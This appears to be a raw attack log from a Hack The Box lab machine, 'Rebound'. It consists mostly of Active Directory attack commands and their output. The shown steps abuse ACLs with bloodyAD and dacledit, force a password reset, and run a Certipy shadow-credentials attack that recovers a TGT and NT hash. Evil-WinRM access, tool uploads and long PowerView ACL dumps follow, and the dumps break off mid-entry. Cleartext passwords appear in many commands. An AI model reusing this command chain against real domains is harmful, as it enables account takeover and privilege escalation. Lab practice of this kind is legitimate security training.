lastLogon                         : 04/04/2025 13:06:15 (today)
logonHours                        : ////////////////////////////
pwdLastSet                        : 04/04/2025 13:33:00 (today)
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-7684
accountExpires                    : 1601-01-01 00:00:00+00:00
logonCount                        : 4
sAMAccountName                    : winrm_svc
sAMAccountType                    : SAM_USER_OBJECT
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData             : 04/04/2025
                                    04/04/2025
                                    04/04/2025
                                    04/04/2025
                                    01/01/1601
lastLogonTimestamp                : 04/04/2025 12:54:09 (today)

objectClass               : top
                            organizationalUnit
ou                        : Service Users
distinguishedName         : OU=Service Users,DC=rebound,DC=htb
instanceType              : 4
whenCreated               : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged               : 04/04/2025 13:33:03 (today)
uSNCreated                : 69325
uSNChanged                : 185428
name                      : Service Users
objectGUID                : {fc826af9-06f9-47e7-866e-4c3c015638b8}
objectCategory            : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData     : 04/04/2025
                            04/04/2025
                            04/04/2025
                            04/04/2025
                            01/01/1601

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainGroup -MemberIdentity "winrm_svc"
cn                    : Remote Management Users
description           : Members of this group can access WMI resources over management protocols (such as WS-Management via
                        the Windows Remote Management service). This applies only to WMI namespaces that grant access to the
                         user.
member                : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
distinguishedName     : CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
instanceType          : 4
name                  : Remote Management Users
objectGUID            : {263ebfb8-61f1-4f04-97d1-c0e7399e85c8}
objectSid             : S-1-5-32-580
sAMAccountName        : Remote Management Users
sAMAccountType        : SAM_ALIAS_OBJECT
groupType             : -2147483643
objectCategory        : CN=Group,CN=Schema,CN=Configuration,DC=rebound,DC=htb

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainGroupMember -Identity "ServiceMgmt"
GroupDomainName             : ServiceMgmt
GroupDistinguishedName      : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain                : rebound.htb
MemberName                  : ppaul
MemberDistinguishedName     : CN=ppaul,CN=Users,DC=rebound,DC=htb
MemberSID                   : S-1-5-21-4078382237-1492182817-2568127209-1951

GroupDomainName             : ServiceMgmt
GroupDistinguishedName      : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain                : rebound.htb
MemberName                  : fflock
MemberDistinguishedName     : CN=fflock,CN=Users,DC=rebound,DC=htb
MemberSID                   : S-1-5-21-4078382237-1492182817-2568127209-3382

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity "ServiceMgmt" -Members "oorend"
[2025-04-04 15:06:49] User oorend successfully added to ServiceMgmt

bloodyAD --host 10.10.11.231 -u oorend -p '1GR8t@$$4u' -d bloody add genericAll "OU=Service Users,DC=rebound,DC=htb" "oorend"

dacledit.py rebound.htb/oorend:'1GR8t@$$4u' -k -dc-ip 10.10.11.231 -action write -rights FullControl -inheritance -principal oorend -target-dn "OU=Service Users,DC=rebound,DC=htb" -use-ldaps

bloodyAD --host 10.10.11.231 -u oorend -p '1GR8t@$$4u' -d bloody set password "winrm_svc" '123qwe!@#'

pipx install certipy-ad

certipy shadow auto -account 'winrm_svc' -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -dc-ip 10.10.11.231 -k -target-ip dc01.rebound.htb

┌──(root㉿escorpion)-[~]
└─# certipy shadow auto -account 'winrm_svc' -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -dc-ip 10.10.11.231 -k -target-ip dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos or SSPI authentication is used. This might fail
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb'
[*] Adding Key Credential with device ID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c All -ns 10.10.11.231

apt install ntpdate
sudo ntpdate rebound.htb

timedatectl set-ntp off
rdate -n [IP of Target]

nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --bloodhound -c all --dns-server 10.10.11.231

nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --bloodhound -c all --dns-server 10.10.11.231

*Evil-WinRM* PS C:\Users\winrm_svc> qwinsta
qwinsta.exe : No session exists for *
    + CategoryInfo          : NotSpecified: (No session exists for *:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

upload /root/htb/Rebound/RunasCs.exe

*Evil-WinRM* PS C:\Users\winrm_svc> .\RunasCs.exe oorend '1GR8t@$$4u' "qwinsta" -l 9

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           tbrady                    1  Active

upload /root/htb/Rebound/PowerView.ps1
 . .\PowerView.ps1

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainuser -identity tbrady


logoncount                    : 50
badpasswordtime               : 4/4/2025 5:32:25 AM
distinguishedname             : CN=tbrady,CN=Users,DC=rebound,DC=htb
objectclass                   : {top, person, organizationalPerson, user}
lastlogontimestamp            : 4/4/2025 2:30:48 AM
name                          : tbrady
objectsid                     : S-1-5-21-4078382237-1492182817-2568127209-7686
samaccountname                : tbrady
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
countrycode                   : 0
whenchanged                   : 4/4/2025 9:30:48 AM
instancetype                  : 4
usncreated                    : 69346
objectguid                    : d9ee43f7-de07-42ee-9f51-cd9c1f37e111
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dscorepropagationdata         : {8/25/2023 10:05:00 PM, 1/1/1601 12:00:00 AM}
lastlogon                     : 4/4/2025 6:42:21 AM
badpwdcount                   : 0
cn                            : tbrady
useraccountcontrol            : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated                   : 4/8/2023 9:08:31 AM
primarygroupid                : 513
pwdlastset                    : 4/8/2023 2:08:31 AM
msds-supportedencryptiontypes : 0
usnchanged                    : 184371

*Evil-WinRM* PS C:\Users\winrm_svc> get-adserviceaccount -filter *


DistinguishedName : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
Enabled           : True
Name              : delegator
ObjectClass       : msDS-GroupManagedServiceAccount
ObjectGUID        : c9da97ae-5e35-44d2-aa15-114aecdc0caf
SamAccountName    : delegator$
SID               : S-1-5-21-4078382237-1492182817-2568127209-7687
UserPrincipalName :

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainuser -properties samaccountname,memberof

samaccountname memberof
-------------- --------
Administrator  {CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb, CN=Domain Admins,CN=Users,DC=rebound,DC=htb, CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb, CN=Schema Admins,CN=Users,DC=rebound,DC=htb...}
Guest          CN=Guests,CN=Builtin,DC=rebound,DC=htb
krbtgt         CN=Denied RODC Password Replication Group,CN=Users,DC=rebound,DC=htb
ppaul          CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
llune
fflock         CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc      CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
batch_runner
tbrady

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainobjectacl | where-object { $_.SecurityIdentifier -eq "S-1-1-0" }


ObjectDN              : DC=rebound,DC=htb
ObjectSID             : S-1-5-21-4078382237-1492182817-2568127209
ActiveDirectoryRights : DeleteChild
BinaryLength          : 20
AceQualifier          : AccessDenied
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 2
SecurityIdentifier    : S-1-1-0
AceType               : AccessDenied
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=rebound,DC=htb
ObjectSID             : S-1-5-21-4078382237-1492182817-2568127209
ActiveDirectoryRights : ReadProperty
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 16
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN               : CN=AdminSDHolder,CN=System,DC=rebound,DC=htb
ObjectSID              :
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Administrator,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-500
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Guest,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-501
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN              : CN=Builtin,DC=rebound,DC=htb
ObjectSID             : S-1-5-32
ActiveDirectoryRights : ReadProperty
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 16
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN               : CN=Administrators,CN=Builtin,DC=rebound,DC=htb
ObjectSID              : S-1-5-32-544
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID              : S-1-5-4
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID              : S-1-5-11
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Print Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID              : S-1-5-32-550
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Backup Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID              : S-1-5-32-551
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Replicator,CN=Builtin,DC=rebound,DC=htb
ObjectSID              : S-1-5-32-552
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID              : S-1-5-17
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=DC01,OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-1000
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=krbtgt,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-502
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Domain Controllers,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-516
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Schema Admins,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-518
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-519
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Domain Admins,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-512
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Server Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID              : S-1-5-32-549
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Account Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID              : S-1-5-32-548
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID              : S-1-5-9
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Read-only Domain Controllers,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-521
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Key Admins,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-526
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=Enterprise Key Admins,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-527
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN              : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
